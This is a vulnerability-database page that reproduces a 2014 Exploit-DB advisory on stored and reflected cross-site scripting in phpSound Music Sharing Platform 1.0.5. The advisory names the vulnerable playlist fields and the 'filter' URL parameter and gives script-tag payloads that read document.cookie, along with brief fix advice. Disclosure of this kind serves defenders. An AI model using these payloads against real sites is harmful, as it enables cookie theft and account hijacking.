Lucene search
+L

phpSound Music Sharing Platform 1.0.5 - Multiple Cross-Site Scripting Vulnerabilities

🗓️ 10 Nov 2014 00:00:00Reported by Halil DalabasmazType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

phpSound Music Sharing Platform 1.0.5 has multiple Cross-Site Scripting Vulnerabilities, including stored and reflected XSS

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-8954
10 Nov 201400:00
circl
CVE
CVE-2014-8954
17 Nov 201416:00
cve
Cvelist
CVE-2014-8954
17 Nov 201416:00
cvelist
EUVD
EUVD-2014-8781
7 Oct 202500:30
euvd
NVD
CVE-2014-8954
17 Nov 201416:59
nvd
OpenVAS
phpSound <= 1.0.5 Multiple XSS Vulnerabilities
27 Nov 201400:00
openvas
Prion
Cross site scripting
17 Nov 201416:59
prion
# Exploit Title: phpSound Music Sharing Platform Multiple XSS Vulnerabilities
# Date: 08-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.0.5
# Vendor Link: http://codecanyon.net/item/phpsound-music-sharing-platform/9016117
# Software Test Link: http://phpsound.com/demo

# Vulnerabilities Description:

===Stored XSS===
Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields.

Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>

Solution
Filter the input fields aganist to XSS attacks.

===

===Reflected XSS===

The URL parameter is "filter" not filtered.

http://server/path/index.php?a=explore&filter=XSS

Sample Payload for XSS: </title><script>alert(document.cookie);</script>

Solution
Filter the parameter aganist to XSS attacks.
===

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.03217
27